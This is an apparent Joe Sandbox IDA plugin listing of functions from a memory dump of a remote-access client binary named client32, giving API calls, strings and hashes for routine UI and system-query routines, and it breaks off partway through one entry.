Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DestroyMessageSendWindow__wcstoi64
String ID: BlankAll$View
API String ID: 321412109-3798095874
Opcode ID: 38df984c28d4ef38a8c37f08fada72d5221e109f2b49a7e4029b6982e407041f
Instruction ID: fa6ce96dcec4713ec44a6fea70dda2fc35063a1a39e070fc1259ad02d852b18a
Opcode Fuzzy Hash: 38df984c28d4ef38a8c37f08fada72d5221e109f2b49a7e4029b6982e407041f
Instruction Fuzzy Hash: 1E1191B5A007066FE3249B768CC0AABF6EDEF48358B90082DF25747650CB74BC40C761

Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 111535AC
_memmove.LIBCMT ref: 111535E6

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\WCUNPACK.C, xrefs: 111535C1
n > 128, xrefs: 111535C6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$ErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\WCUNPACK.C$n > 128
API String ID: 6605023-1396654219
Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0

Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A

Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4

TranslateMessage.USER32(?), ref: 11027850
DispatchMessageA.USER32(?), ref: 11027856

Strings

Exit Msgloop, quit=%d, xrefs: 1102788D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5

Function 11139860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(111F1BC0), ref: 111398B1

Strings

Inited VolumeControl Subsystem (OK: 1 Ref)., xrefs: 111398DA
Initing VolumeControl Subsystem..., xrefs: 11139898
Inited VolumeControl Subsystem (OK: Ref's already exist)., xrefs: 11139936

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: IncrementInterlocked
String ID: Inited VolumeControl Subsystem (OK: 1 Ref).$Inited VolumeControl Subsystem (OK: Ref's already exist).$Initing VolumeControl Subsystem...
API String ID: 3508698243-2739245937
Opcode ID: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
Instruction ID: 8ac7705195b121ec2a8e66f06046531bb3c3c41fe71c89f648c6a83688c0c473
Opcode Fuzzy Hash: f5dded5991a1729abc01e431adb55c9e4ab023a8a7af5cf22b29cff14a83106b
Instruction Fuzzy Hash: 18012B79E0451EA7CB00AFF59D41B9EF768DB82A2DF100A75E419D3A44FB35750087A1

Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,00000001), ref: 110395E6
EnableWindow.USER32(00000000,00000000), ref: 110395EE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 110395CE
m_hWnd, xrefs: 110395D3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4

Function 11157A90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(00000000,00000000,00000000), ref: 11157AE3
UpdateWindow.USER32(?), ref: 11157B0E

Strings

m_hWnd, xrefs: 11157ACE, 11157AFD
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11157AC9, 11157AF8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InvalidateRectUpdateWindow
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1236202516-2830328467
Opcode ID: a99ec8f40edeecc26235211e442f7dfb949e68108ac4ffb9dba66db57fc84ff5
Instruction ID: a96b59742f359bb888188d220195e1b4da783019d41d239ad7a474719c7ba3bc
Opcode Fuzzy Hash: a99ec8f40edeecc26235211e442f7dfb949e68108ac4ffb9dba66db57fc84ff5
Instruction Fuzzy Hash: C20149B5A00A12A7C6A097E1DC43F8BF360BB4930CF144839F07727540E670B840C795

Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\listview.cpp, xrefs: 110AAFFE
m_hWnd, xrefs: 11015413, 110AB003
..\ctl32\liststat.cpp, xrefs: 1101540E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
API String ID: 819365019-2727927828
Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1

Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110ED498

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

lpNmHdr!=0, xrefs: 110ED483
IsWindow(hRich), xrefs: 110ED4A9
..\CTL32\NSWin32.cpp, xrefs: 110ED47E, 110ED4A4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
API String ID: 2577986331-1331251348
Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9

Function 1103F4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF

IsWindow.USER32(00000000), ref: 1103F4EA
SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD

Strings

PCIVideoSlave32, xrefs: 1103F508
DoMMData - could not find %s window, xrefs: 1103F50D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$MessageSendSleep
String ID: DoMMData - could not find %s window$PCIVideoSlave32
API String ID: 1010850397-3146847729
Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB

Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110179ED

Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1101792C
Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0

Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 11017842
Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0

SetEvent.KERNEL32(00000000), ref: 11017A0D
GetTickCount.KERNEL32 ref: 11017A13

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3804766296-4122679463
Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1

Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110816D7

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsA(), xrefs: 11081699, 110816C0
..\CTL32\DataStream.cpp, xrefs: 11081694
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110816BB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_freewsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 2441568934-1875806619
Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2

Function 110EFB20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32(?,0000000E), ref: 110EFB32
GetDeviceCaps.GDI32(?,0000000C), ref: 110EFB39

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
